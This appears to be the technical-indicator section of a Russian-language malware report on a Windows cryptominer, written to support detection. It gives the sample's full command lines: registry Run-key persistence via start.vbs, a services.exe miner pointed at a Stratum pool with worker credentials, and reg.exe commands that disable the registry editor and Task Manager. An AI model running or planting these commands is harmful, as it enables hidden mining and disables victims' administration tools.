Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wservices.exe' = '%TEMP%\start.vbs' (параметр автозапуска: start.vbs запускается при каждом входе пользователя в систему)
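- '%TEMP%\services.exe' --url=stratum+tcp://eu.ltcrabbit.com:3333 --userpass=mediaclickinc.7:12345 (файл с именем services.exe запускается из %TEMP%, а не из <SYSTEM32>; параметры командной строки задают подключение к майнинговому пулу по протоколу Stratum)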
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run /v wservices.exe /t REG_SZ /d %TEMP%\start.vbs
- '<SYSTEM32>\wscript.exe' "%TEMP%\start.vbs"
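- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools, 1, "REG_DWORD"
- '<SYSTEM32>\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1, "REG_DWORD"
  (Примечание: DisableRegistryTools и DisableTaskMgr — параметры политик, блокирующие редактор реестра и диспетчер задач. В отличие от команды для ключа Run выше, здесь не использованы ключи /v, /t и /d, поэтому в записанном виде команда, вероятно, завершится ошибкой синтаксиса. При обнаружении стоит опираться на саму командную строку, а не только на итоговое значение в реестре.)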
- %TEMP%\start.vbs
- %TEMP%\zlib1.dll
- %TEMP%\services.exe
- %TEMP%\libcurl-4.dll
- %TEMP%\pthreadGC2.dll
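- 'eu.###rabbit.com':3333 (имя узла частично замаскировано в отчёте; порт совпадает с адресом пула в командной строке services.exe выше)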
- DNS ASK eu.###rabbit.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''